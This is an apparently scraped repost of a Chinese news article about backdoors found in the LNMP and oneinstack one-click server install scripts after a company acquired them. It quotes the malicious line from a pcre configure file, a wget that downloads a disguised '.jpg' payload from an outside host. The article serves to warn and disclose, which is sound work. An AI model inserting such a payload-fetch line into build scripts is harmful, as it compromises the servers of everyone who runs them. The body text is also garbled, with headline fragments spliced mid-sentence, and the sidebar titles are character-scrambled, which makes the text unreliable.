您現(xiàn)在的位置是:桑間濮上網(wǎng) > 娛樂
繼LNMP后oneinstack也被添加了后門程序 建議用戶不要使用這類腳本 – 藍(lán)點(diǎn)網(wǎng)
桑間濮上網(wǎng)2025-12-10 00:59:24【娛樂】3人已圍觀
簡介9 月下旬,國內(nèi)安全公司發(fā)現(xiàn)知名 Web 集成環(huán)境安裝腳本 “l(fā)nmp 一鍵安裝包” 被投毒,開發(fā)者、站長、企業(yè) IT 管理員下載的一鍵安裝包被加了后門程序。當(dāng)時我們都以為這是 LNMP 一鍵安裝包的
9 月下旬,繼L建議腳本國內(nèi)安全公司發(fā)現(xiàn)知名 Web 集成環(huán)境安裝腳本 “l(fā)nmp 一鍵安裝包” 被投毒,后后門開發(fā)者、也被用戶用類站長、添加企業(yè) IT 管理員下載的程序一鍵安裝包被加了后門程序。
當(dāng)時我們都以為這是不使 LNMP 一鍵安裝包的服務(wù)器被黑了 (LNMP.org),不過后來有網(wǎng)友發(fā)現(xiàn) LNMP 一鍵安裝包已經(jīng)被金華市矜貴網(wǎng)絡(luò)科技有限公司 (下稱金華矜貴) 收購。藍(lán)點(diǎn)
而關(guān)于安裝包被投毒問題金華矜貴沒有發(fā)布任何聲明,繼L建議腳本LNMP 論壇的后后門發(fā)帖也遭到管理員刪除。
現(xiàn)在來看這并不是也被用戶用類服務(wù)器被黑了,因?yàn)楸唤鹑A矜貴收購的添加另一個集成環(huán)境安裝腳本 oneinstack 也被發(fā)現(xiàn)投毒,所以情況很明了了:那就是程序根本不是服務(wù)器被黑,而是不使他們自己在腳本里插入了惡意代碼,用來下載某些惡意軟件,藍(lán)點(diǎn)進(jìn)而可以控制大量網(wǎng)站或服務(wù)器,繼L建議腳本但具體目的尚不清楚。
目前在 GitHub 和 V2EX 上已經(jīng)有帖子在討論這件事,鑒于金華矜貴還試圖收購秋水逸冰的 lamp.sh 一鍵安裝包 (但被秋大拒絕了),他們后續(xù)可能還會盯上其他一鍵安裝包,因此建議大家不要再使用這類一鍵安裝包,否則自己的網(wǎng)站或服務(wù)器可能也會變成肉雞。
更新:oneinstack 開發(fā)者回應(yīng)稱:金華市矜貴網(wǎng)絡(luò)科技有限公司收購現(xiàn)有的幾個面板以及安裝包主要是為了布局類似寶塔的產(chǎn)品。想依賴 oneinstack 打開知名度。公司作為項(xiàng)目的投資商。協(xié)商的協(xié)議為公司為項(xiàng)目提供開發(fā)資金,并提供所有服務(wù)器資源。但是項(xiàng)目的管理權(quán)限以及運(yùn)維權(quán)限都在我手中。目前各位開發(fā)者的精力主要是進(jìn)行新的面板開發(fā),對于出現(xiàn)本次被掛馬事故主要原因在于我們沒有對項(xiàng)目進(jìn)行及時的管理。后續(xù)會加強(qiáng)安全措施。杜絕該問題的出現(xiàn)。
惡意代碼藏在圖片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
詳細(xì)請看 GitHub 討論:https://github.com/oneinstack/oneinstack/issues/511
很贊哦!(253)
熱門文章
站長推薦
友情鏈接
- MT3公測期遠(yuǎn) 邢山虎決計做最知己足游
- 《豪杰傳講:黎之軌跡》新飽吹片公布 諸多尾要角色表態(tài)
- 女神雷神去助陣《萌辱寶貝》激爽大年夜治斗
- 《Valorant》公布背景故事民圓動繪 仄止宇宙能源戰(zhàn)役
- Roguelite戰(zhàn)略RPG《最后的咒語》本日開啟搶先體驗(yàn)
- 沖破游戲本致薄與機(jī)能上限 齊新中星人x15/x17 應(yīng)戰(zhàn)鴻溝
- 具有64位措置器 三星J1齊新系列足機(jī)即將退場
- 神兵醉覺 足游《每天魏蜀吳》新體系本日正式開啟
- 沖破限定快速進(jìn)級 《新秦時明月》新版大年夜掀秘
- 《LEGO建制者之旅》6月22日登岸Switch戰(zhàn)Steam仄臺 支撐N卡光遁